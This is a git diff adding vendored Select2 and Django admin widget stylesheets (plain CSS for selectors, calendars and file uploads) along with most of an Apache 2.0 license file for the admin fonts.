border-color: #888 transparent transparent transparent; + border-style: solid; + border-width: 5px 4px 0 4px; + height: 0; + left: 50%; + margin-left: -4px; + margin-top: -2px; + position: absolute; + top: 50%; + width: 0; } + +.select2-container--classic[dir="rtl"] .select2-selection--single .select2-selection__clear { + float: left; } + +.select2-container--classic[dir="rtl"] .select2-selection--single .select2-selection__arrow { + border: none; + border-right: 1px solid #aaa; + border-radius: 0; + border-top-left-radius: 4px; + border-bottom-left-radius: 4px; + left: 1px; + right: auto; } + +.select2-container--classic.select2-container--open .select2-selection--single { + border: 1px solid #5897fb; } + .select2-container--classic.select2-container--open .select2-selection--single .select2-selection__arrow { + background: transparent; + border: none; } + .select2-container--classic.select2-container--open .select2-selection--single .select2-selection__arrow b { + border-color: transparent transparent #888 transparent; + border-width: 0 4px 5px 4px; } + +.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single { + border-top: none; + border-top-left-radius: 0; + border-top-right-radius: 0; + background-image: -webkit-linear-gradient(top, white 0%, #eeeeee 50%); + background-image: -o-linear-gradient(top, white 0%, #eeeeee 50%); + background-image: linear-gradient(to bottom, white 0%, #eeeeee 50%); + background-repeat: repeat-x; + filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFFFFFFF', endColorstr='#FFEEEEEE', GradientType=0); } + +.select2-container--classic.select2-container--open.select2-container--below .select2-selection--single { + border-bottom: none; + border-bottom-left-radius: 0; + border-bottom-right-radius: 0; + background-image: -webkit-linear-gradient(top, #eeeeee 50%, white 100%); + background-image: -o-linear-gradient(top, #eeeeee 50%, white 100%); + background-image: linear-gradient(to bottom, #eeeeee 50%, white 100%); + background-repeat: repeat-x; + filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFEEEEEE', endColorstr='#FFFFFFFF', GradientType=0); } + +.select2-container--classic .select2-selection--multiple { + background-color: white; + border: 1px solid #aaa; + border-radius: 4px; + cursor: text; + outline: 0; } + .select2-container--classic .select2-selection--multiple:focus { + border: 1px solid #5897fb; } + .select2-container--classic .select2-selection--multiple .select2-selection__rendered { + list-style: none; + margin: 0; + padding: 0 5px; } + .select2-container--classic .select2-selection--multiple .select2-selection__clear { + display: none; } + .select2-container--classic .select2-selection--multiple .select2-selection__choice { + background-color: #e4e4e4; + border: 1px solid #aaa; + border-radius: 4px; + cursor: default; + float: left; + margin-right: 5px; + margin-top: 5px; + padding: 0 5px; } + .select2-container--classic .select2-selection--multiple .select2-selection__choice__remove { + color: #888; + cursor: pointer; + display: inline-block; + font-weight: bold; + margin-right: 2px; } + .select2-container--classic .select2-selection--multiple .select2-selection__choice__remove:hover { + color: #555; } + +.select2-container--classic[dir="rtl"] .select2-selection--multiple .select2-selection__choice { + float: right; + margin-left: 5px; + margin-right: auto; } + +.select2-container--classic[dir="rtl"] .select2-selection--multiple .select2-selection__choice__remove { + margin-left: 2px; + margin-right: auto; } + +.select2-container--classic.select2-container--open .select2-selection--multiple { + border: 1px solid #5897fb; } + +.select2-container--classic.select2-container--open.select2-container--above .select2-selection--multiple { + border-top: none; + border-top-left-radius: 0; + border-top-right-radius: 0; } + +.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple { + border-bottom: none; + border-bottom-left-radius: 0; + border-bottom-right-radius: 0; } + +.select2-container--classic .select2-search--dropdown .select2-search__field { + border: 1px solid #aaa; + outline: 0; } + +.select2-container--classic .select2-search--inline .select2-search__field { + outline: 0; + box-shadow: none; } + +.select2-container--classic .select2-dropdown { + background-color: white; + border: 1px solid transparent; } + +.select2-container--classic .select2-dropdown--above { + border-bottom: none; } + +.select2-container--classic .select2-dropdown--below { + border-top: none; } + +.select2-container--classic .select2-results > .select2-results__options { + max-height: 200px; + overflow-y: auto; } + +.select2-container--classic .select2-results__option[role=group] { + padding: 0; } + +.select2-container--classic .select2-results__option[aria-disabled=true] { + color: grey; } + +.select2-container--classic .select2-results__option--highlighted[aria-selected] { + background-color: #3875d7; + color: white; } + +.select2-container--classic .select2-results__group { + cursor: default; + display: block; + padding: 6px; } + +.select2-container--classic.select2-container--open .select2-dropdown { + border-color: #5897fb; } diff --git a/master/static/admin/css/vendor/select2/select2.min.css b/master/static/admin/css/vendor/select2/select2.min.css new file mode 100644 index 0000000..7c18ad5 --- /dev/null +++ b/master/static/admin/css/vendor/select2/select2.min.css @@ -0,0 +1 @@ +.select2-container{box-sizing:border-box;display:inline-block;margin:0;position:relative;vertical-align:middle}.select2-container .select2-selection--single{box-sizing:border-box;cursor:pointer;display:block;height:28px;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--single .select2-selection__rendered{display:block;padding-left:8px;padding-right:20px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.select2-container .select2-selection--single .select2-selection__clear{position:relative}.select2-container[dir="rtl"] .select2-selection--single .select2-selection__rendered{padding-right:8px;padding-left:20px}.select2-container .select2-selection--multiple{box-sizing:border-box;cursor:pointer;display:block;min-height:32px;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--multiple .select2-selection__rendered{display:inline-block;overflow:hidden;padding-left:8px;text-overflow:ellipsis;white-space:nowrap}.select2-container .select2-search--inline{float:left}.select2-container .select2-search--inline .select2-search__field{box-sizing:border-box;border:none;font-size:100%;margin-top:5px;padding:0}.select2-container .select2-search--inline .select2-search__field::-webkit-search-cancel-button{-webkit-appearance:none}.select2-dropdown{background-color:white;border:1px solid #aaa;border-radius:4px;box-sizing:border-box;display:block;position:absolute;left:-100000px;width:100%;z-index:1051}.select2-results{display:block}.select2-results__options{list-style:none;margin:0;padding:0}.select2-results__option{padding:6px;user-select:none;-webkit-user-select:none}.select2-results__option[aria-selected]{cursor:pointer}.select2-container--open .select2-dropdown{left:0}.select2-container--open .select2-dropdown--above{border-bottom:none;border-bottom-left-radius:0;border-bottom-right-radius:0}.select2-container--open .select2-dropdown--below{border-top:none;border-top-left-radius:0;border-top-right-radius:0}.select2-search--dropdown{display:block;padding:4px}.select2-search--dropdown .select2-search__field{padding:4px;width:100%;box-sizing:border-box}.select2-search--dropdown .select2-search__field::-webkit-search-cancel-button{-webkit-appearance:none}.select2-search--dropdown.select2-search--hide{display:none}.select2-close-mask{border:0;margin:0;padding:0;display:block;position:fixed;left:0;top:0;min-height:100%;min-width:100%;height:auto;width:auto;opacity:0;z-index:99;background-color:#fff;filter:alpha(opacity=0)}.select2-hidden-accessible{border:0 !important;clip:rect(0 0 0 0) !important;-webkit-clip-path:inset(50%) !important;clip-path:inset(50%) !important;height:1px !important;overflow:hidden !important;padding:0 !important;position:absolute !important;width:1px !important;white-space:nowrap !important}.select2-container--default .select2-selection--single{background-color:#fff;border:1px solid #aaa;border-radius:4px}.select2-container--default .select2-selection--single .select2-selection__rendered{color:#444;line-height:28px}.select2-container--default .select2-selection--single .select2-selection__clear{cursor:pointer;float:right;font-weight:bold}.select2-container--default .select2-selection--single .select2-selection__placeholder{color:#999}.select2-container--default .select2-selection--single .select2-selection__arrow{height:26px;position:absolute;top:1px;right:1px;width:20px}.select2-container--default .select2-selection--single .select2-selection__arrow b{border-color:#888 transparent transparent transparent;border-style:solid;border-width:5px 4px 0 4px;height:0;left:50%;margin-left:-4px;margin-top:-2px;position:absolute;top:50%;width:0}.select2-container--default[dir="rtl"] .select2-selection--single .select2-selection__clear{float:left}.select2-container--default[dir="rtl"] .select2-selection--single .select2-selection__arrow{left:1px;right:auto}.select2-container--default.select2-container--disabled .select2-selection--single{background-color:#eee;cursor:default}.select2-container--default.select2-container--disabled .select2-selection--single .select2-selection__clear{display:none}.select2-container--default.select2-container--open .select2-selection--single .select2-selection__arrow b{border-color:transparent transparent #888 transparent;border-width:0 4px 5px 4px}.select2-container--default .select2-selection--multiple{background-color:white;border:1px solid #aaa;border-radius:4px;cursor:text}.select2-container--default .select2-selection--multiple .select2-selection__rendered{box-sizing:border-box;list-style:none;margin:0;padding:0 5px;width:100%}.select2-container--default .select2-selection--multiple .select2-selection__rendered li{list-style:none}.select2-container--default .select2-selection--multiple .select2-selection__clear{cursor:pointer;float:right;font-weight:bold;margin-top:5px;margin-right:10px;padding:1px}.select2-container--default .select2-selection--multiple .select2-selection__choice{background-color:#e4e4e4;border:1px solid #aaa;border-radius:4px;cursor:default;float:left;margin-right:5px;margin-top:5px;padding:0 5px}.select2-container--default .select2-selection--multiple .select2-selection__choice__remove{color:#999;cursor:pointer;display:inline-block;font-weight:bold;margin-right:2px}.select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover{color:#333}.select2-container--default[dir="rtl"] .select2-selection--multiple .select2-selection__choice,.select2-container--default[dir="rtl"] .select2-selection--multiple .select2-search--inline{float:right}.select2-container--default[dir="rtl"] .select2-selection--multiple .select2-selection__choice{margin-left:5px;margin-right:auto}.select2-container--default[dir="rtl"] .select2-selection--multiple .select2-selection__choice__remove{margin-left:2px;margin-right:auto}.select2-container--default.select2-container--focus .select2-selection--multiple{border:solid black 1px;outline:0}.select2-container--default.select2-container--disabled .select2-selection--multiple{background-color:#eee;cursor:default}.select2-container--default.select2-container--disabled .select2-selection__choice__remove{display:none}.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,.select2-container--default.select2-container--open.select2-container--above .select2-selection--multiple{border-top-left-radius:0;border-top-right-radius:0}.select2-container--default.select2-container--open.select2-container--below .select2-selection--single,.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom-left-radius:0;border-bottom-right-radius:0}.select2-container--default .select2-search--dropdown .select2-search__field{border:1px solid #aaa}.select2-container--default .select2-search--inline .select2-search__field{background:transparent;border:none;outline:0;box-shadow:none;-webkit-appearance:textfield}.select2-container--default .select2-results>.select2-results__options{max-height:200px;overflow-y:auto}.select2-container--default .select2-results__option[role=group]{padding:0}.select2-container--default .select2-results__option[aria-disabled=true]{color:#999}.select2-container--default .select2-results__option[aria-selected=true]{background-color:#ddd}.select2-container--default .select2-results__option .select2-results__option{padding-left:1em}.select2-container--default .select2-results__option .select2-results__option .select2-results__group{padding-left:0}.select2-container--default .select2-results__option .select2-results__option .select2-results__option{margin-left:-1em;padding-left:2em}.select2-container--default .select2-results__option .select2-results__option .select2-results__option .select2-results__option{margin-left:-2em;padding-left:3em}.select2-container--default .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option{margin-left:-3em;padding-left:4em}.select2-container--default .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option{margin-left:-4em;padding-left:5em}.select2-container--default .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option{margin-left:-5em;padding-left:6em}.select2-container--default .select2-results__option--highlighted[aria-selected]{background-color:#5897fb;color:white}.select2-container--default .select2-results__group{cursor:default;display:block;padding:6px}.select2-container--classic .select2-selection--single{background-color:#f7f7f7;border:1px solid #aaa;border-radius:4px;outline:0;background-image:-webkit-linear-gradient(top, #fff 50%, #eee 100%);background-image:-o-linear-gradient(top, #fff 50%, #eee 100%);background-image:linear-gradient(to bottom, #fff 50%, #eee 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFFFFFFF', endColorstr='#FFEEEEEE', GradientType=0)}.select2-container--classic .select2-selection--single:focus{border:1px solid #5897fb}.select2-container--classic .select2-selection--single .select2-selection__rendered{color:#444;line-height:28px}.select2-container--classic .select2-selection--single .select2-selection__clear{cursor:pointer;float:right;font-weight:bold;margin-right:10px}.select2-container--classic .select2-selection--single .select2-selection__placeholder{color:#999}.select2-container--classic .select2-selection--single .select2-selection__arrow{background-color:#ddd;border:none;border-left:1px solid #aaa;border-top-right-radius:4px;border-bottom-right-radius:4px;height:26px;position:absolute;top:1px;right:1px;width:20px;background-image:-webkit-linear-gradient(top, #eee 50%, #ccc 100%);background-image:-o-linear-gradient(top, #eee 50%, #ccc 100%);background-image:linear-gradient(to bottom, #eee 50%, #ccc 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFEEEEEE', endColorstr='#FFCCCCCC', GradientType=0)}.select2-container--classic .select2-selection--single .select2-selection__arrow b{border-color:#888 transparent transparent transparent;border-style:solid;border-width:5px 4px 0 4px;height:0;left:50%;margin-left:-4px;margin-top:-2px;position:absolute;top:50%;width:0}.select2-container--classic[dir="rtl"] .select2-selection--single .select2-selection__clear{float:left}.select2-container--classic[dir="rtl"] .select2-selection--single .select2-selection__arrow{border:none;border-right:1px solid #aaa;border-radius:0;border-top-left-radius:4px;border-bottom-left-radius:4px;left:1px;right:auto}.select2-container--classic.select2-container--open .select2-selection--single{border:1px solid #5897fb}.select2-container--classic.select2-container--open .select2-selection--single .select2-selection__arrow{background:transparent;border:none}.select2-container--classic.select2-container--open .select2-selection--single .select2-selection__arrow b{border-color:transparent transparent #888 transparent;border-width:0 4px 5px 4px}.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:none;border-top-left-radius:0;border-top-right-radius:0;background-image:-webkit-linear-gradient(top, #fff 0%, #eee 50%);background-image:-o-linear-gradient(top, #fff 0%, #eee 50%);background-image:linear-gradient(to bottom, #fff 0%, #eee 50%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFFFFFFF', endColorstr='#FFEEEEEE', GradientType=0)}.select2-container--classic.select2-container--open.select2-container--below .select2-selection--single{border-bottom:none;border-bottom-left-radius:0;border-bottom-right-radius:0;background-image:-webkit-linear-gradient(top, #eee 50%, #fff 100%);background-image:-o-linear-gradient(top, #eee 50%, #fff 100%);background-image:linear-gradient(to bottom, #eee 50%, #fff 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFEEEEEE', endColorstr='#FFFFFFFF', GradientType=0)}.select2-container--classic .select2-selection--multiple{background-color:white;border:1px solid #aaa;border-radius:4px;cursor:text;outline:0}.select2-container--classic .select2-selection--multiple:focus{border:1px solid #5897fb}.select2-container--classic .select2-selection--multiple .select2-selection__rendered{list-style:none;margin:0;padding:0 5px}.select2-container--classic .select2-selection--multiple .select2-selection__clear{display:none}.select2-container--classic .select2-selection--multiple .select2-selection__choice{background-color:#e4e4e4;border:1px solid #aaa;border-radius:4px;cursor:default;float:left;margin-right:5px;margin-top:5px;padding:0 5px}.select2-container--classic .select2-selection--multiple .select2-selection__choice__remove{color:#888;cursor:pointer;display:inline-block;font-weight:bold;margin-right:2px}.select2-container--classic .select2-selection--multiple .select2-selection__choice__remove:hover{color:#555}.select2-container--classic[dir="rtl"] .select2-selection--multiple .select2-selection__choice{float:right;margin-left:5px;margin-right:auto}.select2-container--classic[dir="rtl"] .select2-selection--multiple .select2-selection__choice__remove{margin-left:2px;margin-right:auto}.select2-container--classic.select2-container--open .select2-selection--multiple{border:1px solid #5897fb}.select2-container--classic.select2-container--open.select2-container--above .select2-selection--multiple{border-top:none;border-top-left-radius:0;border-top-right-radius:0}.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:none;border-bottom-left-radius:0;border-bottom-right-radius:0}.select2-container--classic .select2-search--dropdown .select2-search__field{border:1px solid #aaa;outline:0}.select2-container--classic .select2-search--inline .select2-search__field{outline:0;box-shadow:none}.select2-container--classic .select2-dropdown{background-color:#fff;border:1px solid transparent}.select2-container--classic .select2-dropdown--above{border-bottom:none}.select2-container--classic .select2-dropdown--below{border-top:none}.select2-container--classic .select2-results>.select2-results__options{max-height:200px;overflow-y:auto}.select2-container--classic .select2-results__option[role=group]{padding:0}.select2-container--classic .select2-results__option[aria-disabled=true]{color:grey}.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#3875d7;color:#fff}.select2-container--classic .select2-results__group{cursor:default;display:block;padding:6px}.select2-container--classic.select2-container--open .select2-dropdown{border-color:#5897fb} diff --git a/master/static/admin/css/widgets.css b/master/static/admin/css/widgets.css new file mode 100644 index 0000000..14ef12d --- /dev/null +++ b/master/static/admin/css/widgets.css @@ -0,0 +1,574 @@ +/* SELECTOR (FILTER INTERFACE) */ + +.selector { + width: 800px; + float: left; +} + +.selector select { + width: 380px; + height: 17.2em; +} + +.selector-available, .selector-chosen { + float: left; + width: 380px; + text-align: center; + margin-bottom: 5px; +} + +.selector-chosen select { + border-top: none; +} + +.selector-available h2, .selector-chosen h2 { + border: 1px solid #ccc; + border-radius: 4px 4px 0 0; +} + +.selector-chosen h2 { + background: #79aec8; + color: #fff; +} + +.selector .selector-available h2 { + background: #f8f8f8; + color: #666; +} + +.selector .selector-filter { + background: white; + border: 1px solid #ccc; + border-width: 0 1px; + padding: 8px; + color: #999; + font-size: 10px; + margin: 0; + text-align: left; +} + +.selector .selector-filter label, +.inline-group .aligned .selector .selector-filter label { + float: left; + margin: 7px 0 0; + width: 18px; + height: 18px; + padding: 0; + overflow: hidden; + line-height: 1; +} + +.selector .selector-available input { + width: 320px; + margin-left: 8px; +} + +.selector ul.selector-chooser { + float: left; + width: 22px; + background-color: #eee; + border-radius: 10px; + margin: 10em 5px 0 5px; + padding: 0; +} + +.selector-chooser li { + margin: 0; + padding: 3px; + list-style-type: none; +} + +.selector select { + padding: 0 10px; + margin: 0 0 10px; + border-radius: 0 0 4px 4px; +} + +.selector-add, .selector-remove { + width: 16px; + height: 16px; + display: block; + text-indent: -3000px; + overflow: hidden; + cursor: default; + opacity: 0.3; +} + +.active.selector-add, .active.selector-remove { + opacity: 1; +} + +.active.selector-add:hover, .active.selector-remove:hover { + cursor: pointer; +} + +.selector-add { + background: url(../img/selector-icons.svg) 0 -96px no-repeat; +} + +.active.selector-add:focus, .active.selector-add:hover { + background-position: 0 -112px; +} + +.selector-remove { + background: url(../img/selector-icons.svg) 0 -64px no-repeat; +} + +.active.selector-remove:focus, .active.selector-remove:hover { + background-position: 0 -80px; +} + +a.selector-chooseall, a.selector-clearall { + display: inline-block; + height: 16px; + text-align: left; + margin: 1px auto 3px; + overflow: hidden; + font-weight: bold; + line-height: 16px; + color: #666; + text-decoration: none; + opacity: 0.3; +} + +a.active.selector-chooseall:focus, a.active.selector-clearall:focus, +a.active.selector-chooseall:hover, a.active.selector-clearall:hover { + color: #447e9b; +} + +a.active.selector-chooseall, a.active.selector-clearall { + opacity: 1; +} + +a.active.selector-chooseall:hover, a.active.selector-clearall:hover { + cursor: pointer; +} + +a.selector-chooseall { + padding: 0 18px 0 0; + background: url(../img/selector-icons.svg) right -160px no-repeat; + cursor: default; +} + +a.active.selector-chooseall:focus, a.active.selector-chooseall:hover { + background-position: 100% -176px; +} + +a.selector-clearall { + padding: 0 0 0 18px; + background: url(../img/selector-icons.svg) 0 -128px no-repeat; + cursor: default; +} + +a.active.selector-clearall:focus, a.active.selector-clearall:hover { + background-position: 0 -144px; +} + +/* STACKED SELECTORS */ + +.stacked { + float: left; + width: 490px; +} + +.stacked select { + width: 480px; + height: 10.1em; +} + +.stacked .selector-available, .stacked .selector-chosen { + width: 480px; +} + +.stacked .selector-available { + margin-bottom: 0; +} + +.stacked .selector-available input { + width: 422px; +} + +.stacked ul.selector-chooser { + height: 22px; + width: 50px; + margin: 0 0 10px 40%; + background-color: #eee; + border-radius: 10px; +} + +.stacked .selector-chooser li { + float: left; + padding: 3px 3px 3px 5px; +} + +.stacked .selector-chooseall, .stacked .selector-clearall { + display: none; +} + +.stacked .selector-add { + background: url(../img/selector-icons.svg) 0 -32px no-repeat; + cursor: default; +} + +.stacked .active.selector-add { + background-position: 0 -32px; + cursor: pointer; +} + +.stacked .active.selector-add:focus, .stacked .active.selector-add:hover { + background-position: 0 -48px; + cursor: pointer; +} + +.stacked .selector-remove { + background: url(../img/selector-icons.svg) 0 0 no-repeat; + cursor: default; +} + +.stacked .active.selector-remove { + background-position: 0 0px; + cursor: pointer; +} + +.stacked .active.selector-remove:focus, .stacked .active.selector-remove:hover { + background-position: 0 -16px; + cursor: pointer; +} + +.selector .help-icon { + background: url(../img/icon-unknown.svg) 0 0 no-repeat; + display: inline-block; + vertical-align: middle; + margin: -2px 0 0 2px; + width: 13px; + height: 13px; +} + +.selector .selector-chosen .help-icon { + background: url(../img/icon-unknown-alt.svg) 0 0 no-repeat; +} + +.selector .search-label-icon { + background: url(../img/search.svg) 0 0 no-repeat; + display: inline-block; + height: 18px; + width: 18px; +} + +/* DATE AND TIME */ + +p.datetime { + line-height: 20px; + margin: 0; + padding: 0; + color: #666; + font-weight: bold; +} + +.datetime span { + white-space: nowrap; + font-weight: normal; + font-size: 11px; + color: #ccc; +} + +.datetime input, .form-row .datetime input.vDateField, .form-row .datetime input.vTimeField { + margin-left: 5px; + margin-bottom: 4px; +} + +table p.datetime { + font-size: 11px; + margin-left: 0; + padding-left: 0; +} + +.datetimeshortcuts .clock-icon, .datetimeshortcuts .date-icon { + position: relative; + display: inline-block; + vertical-align: middle; + height: 16px; + width: 16px; + overflow: hidden; +} + +.datetimeshortcuts .clock-icon { + background: url(../img/icon-clock.svg) 0 0 no-repeat; +} + +.datetimeshortcuts a:focus .clock-icon, +.datetimeshortcuts a:hover .clock-icon { + background-position: 0 -16px; +} + +.datetimeshortcuts .date-icon { + background: url(../img/icon-calendar.svg) 0 0 no-repeat; + top: -1px; +} + +.datetimeshortcuts a:focus .date-icon, +.datetimeshortcuts a:hover .date-icon { + background-position: 0 -16px; +} + +.timezonewarning { + font-size: 11px; + color: #999; +} + +/* URL */ + +p.url { + line-height: 20px; + margin: 0; + padding: 0; + color: #666; + font-size: 11px; + font-weight: bold; +} + +.url a { + font-weight: normal; +} + +/* FILE UPLOADS */ + +p.file-upload { + line-height: 20px; + margin: 0; + padding: 0; + color: #666; + font-size: 11px; + font-weight: bold; +} + +.aligned p.file-upload { + margin-left: 170px; +} + +.file-upload a { + font-weight: normal; +} + +.file-upload .deletelink { + margin-left: 5px; +} + +span.clearable-file-input label { + color: #333; + font-size: 11px; + display: inline; + float: none; +} + +/* CALENDARS & CLOCKS */ + +.calendarbox, .clockbox { + margin: 5px auto; + font-size: 12px; + width: 19em; + text-align: center; + background: white; + border: 1px solid #ddd; + border-radius: 4px; + box-shadow: 0 2px 4px rgba(0, 0, 0, 0.15); + overflow: hidden; + position: relative; +} + +.clockbox { + width: auto; +} + +.calendar { + margin: 0; + padding: 0; +} + +.calendar table { + margin: 0; + padding: 0; + border-collapse: collapse; + background: white; + width: 100%; +} + +.calendar caption, .calendarbox h2 { + margin: 0; + text-align: center; + border-top: none; + background: #f5dd5d; + font-weight: 700; + font-size: 12px; + color: #333; +} + +.calendar th { + padding: 8px 5px; + background: #f8f8f8; + border-bottom: 1px solid #ddd; + font-weight: 400; + font-size: 12px; + text-align: center; + color: #666; +} + +.calendar td { + font-weight: 400; + font-size: 12px; + text-align: center; + padding: 0; + border-top: 1px solid #eee; + border-bottom: none; +} + +.calendar td.selected a { + background: #79aec8; + color: #fff; +} + +.calendar td.nonday { + background: #f8f8f8; +} + +.calendar td.today a { + font-weight: 700; +} + +.calendar td a, .timelist a { + display: block; + font-weight: 400; + padding: 6px; + text-decoration: none; + color: #444; +} + +.calendar td a:focus, .timelist a:focus, +.calendar td a:hover, .timelist a:hover { + background: #79aec8; + color: white; +} + +.calendar td a:active, .timelist a:active { + background: #417690; + color: white; +} + +.calendarnav { + font-size: 10px; + text-align: center; + color: #ccc; + margin: 0; + padding: 1px 3px; +} + +.calendarnav a:link, #calendarnav a:visited, +#calendarnav a:focus, #calendarnav a:hover { + color: #999; +} + +.calendar-shortcuts { + background: white; + font-size: 11px; + line-height: 11px; + border-top: 1px solid #eee; + padding: 8px 0; + color: #ccc; +} + +.calendarbox .calendarnav-previous, .calendarbox .calendarnav-next { + display: block; + position: absolute; + top: 8px; + width: 15px; + height: 15px; + text-indent: -9999px; + padding: 0; +} + +.calendarnav-previous { + left: 10px; + background: url(../img/calendar-icons.svg) 0 0 no-repeat; +} + +.calendarbox .calendarnav-previous:focus, +.calendarbox .calendarnav-previous:hover { + background-position: 0 -15px; +} + +.calendarnav-next { + right: 10px; + background: url(../img/calendar-icons.svg) 0 -30px no-repeat; +} + +.calendarbox .calendarnav-next:focus, +.calendarbox .calendarnav-next:hover { + background-position: 0 -45px; +} + +.calendar-cancel { + margin: 0; + padding: 4px 0; + font-size: 12px; + background: #eee; + border-top: 1px solid #ddd; + color: #333; +} + +.calendar-cancel:focus, .calendar-cancel:hover { + background: #ddd; +} + +.calendar-cancel a { + color: black; + display: block; +} + +ul.timelist, .timelist li { + list-style-type: none; + margin: 0; + padding: 0; +} + +.timelist a { + padding: 2px; +} + +/* EDIT INLINE */ + +.inline-deletelink { + float: right; + text-indent: -9999px; + background: url(../img/inline-delete.svg) 0 0 no-repeat; + width: 16px; + height: 16px; + border: 0px none; +} + +.inline-deletelink:focus, .inline-deletelink:hover { + cursor: pointer; +} + +/* RELATED WIDGET WRAPPER */ +.related-widget-wrapper { + float: left; /* display properly in form rows with multiple fields */ + overflow: hidden; /* clear floated contents */ +} + +.related-widget-wrapper-link { + opacity: 0.3; +} + +.related-widget-wrapper-link:link { + opacity: .8; +} + +.related-widget-wrapper-link:link:focus, +.related-widget-wrapper-link:link:hover { + opacity: 1; +} + +select + .related-widget-wrapper-link, +.related-widget-wrapper-link + .related-widget-wrapper-link { + margin-left: 7px; +} diff --git a/master/static/admin/fonts/LICENSE.txt b/master/static/admin/fonts/LICENSE.txt new file mode 100644 index 0000000..d645695 --- /dev/null +++ b/master/static/admin/fonts/LICENSE.txt @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor 